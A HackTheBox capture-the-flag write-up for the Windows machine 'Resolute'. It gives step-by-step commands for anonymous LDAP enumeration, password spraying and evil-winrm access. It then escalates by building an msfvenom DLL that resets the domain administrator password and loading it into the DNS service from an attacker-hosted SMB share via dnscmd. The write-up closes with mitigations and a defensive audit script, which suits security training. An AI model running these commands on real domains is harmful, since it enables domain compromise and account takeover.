Resolute

Overview

Machine: Resolute
Platform: HackTheBox
Difficulty: Medium
OS: Windows

This machine focuses on Active Directory enumeration and credential discovery (via LDAP user attributes and PowerShell transcript logs), leading to privilege escalation through a group-membership misconfiguration (DnsAdmins).

Kill Chain

  1. Anonymous LDAP Enumeration
  2. Credential Disclosure via LDAP User Attributes
  3. Password spraying → Initial Access
  4. Credential Discovery via PowerShell Transcripts
  5. Privilege Enumeration (DnsAdmins)
  6. Abuse of DNS Service Configuration → Privilege Escalation

Needed Tools

Recon

  • configure hosts entry
  • nmap scan of the machine
nmap -Pn resolute.htb


nmap -sCV resolute.htb


  • Perform anonymous LDAP enumeration to gather domain user information
ldapsearch -x -b "dc=megabank,dc=local" -H ldap://megabank.local

LDAP allows unauthenticated queries in misconfigured environments, which can expose user objects and sensitive attributes such as the description field.

Enumeration

  • list user and descriptions with netexec
nxc ldap resolute.htb -u '' -p '' --users


  • test the disclosed default password
nxc smb resolute.htb -u 'marko' -p '*****'

It seems the user has already changed the password.

Initial Access

  • create a user.txt as userlist
nxc ldap resolute.htb -u '' -p '' --users | grep -E '^[a-zA-Z]' | awk '{print $5}' > user.txt


  • password spraying for all users
nxc smb resolute.htb -u user.txt -p '******'


  • connect as user via winrm
evil-winrm -i resolute.htb -u '*****' -p '******'
  • get userflag
cat C:\Users\*****\Desktop\user.txt

Privilege escalation

  • Enumerate hidden directories using dir -force
cd C:\
dir -force
cd PSTranscripts\
dir -force
cd 20191203


  • Analyze PowerShell transcript logs for potential credential disclosure
cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


  • get credentials of user ryan
  • connect as user ryan via winrm
evil-winrm -i resolute.htb -u 'ryan' -p '******'


  • check the groups of user ryan
whoami /groups

Members of the DnsAdmins group can configure the DNS service, including registering an arbitrary DLL as a server-level plugin that the service loads.

  • create evil dll with msfvenom
msfvenom -p windows/x64/exec cmd='net user administrator adminadmin /domain' -f dll -o evil.dll


  • start impacket smbshare on client
sudo impacket-smbserver share .


  • configure dns via dnscmd
dnscmd localhost /config /serverlevelplugindll \\$ip\share\evil.dll


  • check the dnscmd config
dnscmd localhost /info /serverlevelplugindll


  • restart the DNS service on the server

The DNS service loads the configured plugin DLL on restart and executes it with SYSTEM privileges, which is why a restart is required for the change to take effect.

sc.exe stop dns
sc.exe start dns


  • connect as administrator via winrm
evil-winrm -i resolute.htb -u 'Administrator' -p '*****'


  • read root.txt
cat C:\Users\Administrator\Desktop\root.txt

Possible Mitigation

  • Restrict anonymous LDAP access
  • Avoid storing credentials in plaintext (for example in user description attributes)
  • Secure PowerShell transcript logs so that low-privileged users cannot read them
  • Apply the principle of least privilege (DnsAdmins membership is effectively SYSTEM on the DNS server)
  • Harden the DNS service configuration, including the server-level plugin DLL setting
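As an added defender-side check (not part of the original write-up), the following PowerShell audits the two conditions the escalation above depends on: a configured ServerLevelPluginDll value and the membership of DnsAdmins. It assumes it runs on the DNS server with the ActiveDirectory module installed; the registry path is the one that dnscmd /config /serverlevelplugindll writes to.

```powershell
# Added defensive audit for the DnsAdmins / ServerLevelPluginDll abuse described above.
# Assumption: run as an administrator on the DNS server with the ActiveDirectory module.
# Registry location behind `dnscmd localhost /config /serverlevelplugindll`.
$DnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsPluginDllFinding {
    # Report whether a server-level plugin DLL is configured and how suspicious it looks.
    $value = (Get-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll `
                -ErrorAction SilentlyContinue).ServerLevelPluginDll
    if ([string]::IsNullOrEmpty($value)) {
        return [pscustomobject]@{ Check = 'ServerLevelPluginDll'; Status = 'OK'; Detail = 'not set' }
    }
    # A UNC path is the pattern used in the write-up: the DLL is pulled from a remote SMB share.
    $status = if ($value -like '\\*') { 'CRITICAL (UNC path)' } else { 'REVIEW (local DLL)' }
    [pscustomobject]@{ Check = 'ServerLevelPluginDll'; Status = $status; Detail = $value }
}

function Get-DnsAdminsFinding {
    # Every member of DnsAdmins can set the value above, so the group should normally be empty.
    $members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
               Select-Object -ExpandProperty SamAccountName
    $status = if ($members) { 'REVIEW' } else { 'OK' }
    [pscustomobject]@{ Check = 'DnsAdmins members'; Status = $status; Detail = ($members -join ', ') }
}

function Remove-DnsPluginDll {
    # Remediation: clear the value and restart the service so no plugin DLL is loaded.
    Remove-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    Restart-Service -Name DNS
}

Get-DnsPluginDllFinding
Get-DnsAdminsFinding
```

Run the two Get-* functions on a schedule and alert on any status other than OK; call Remove-DnsPluginDll only after confirming the DLL is not a legitimate plugin.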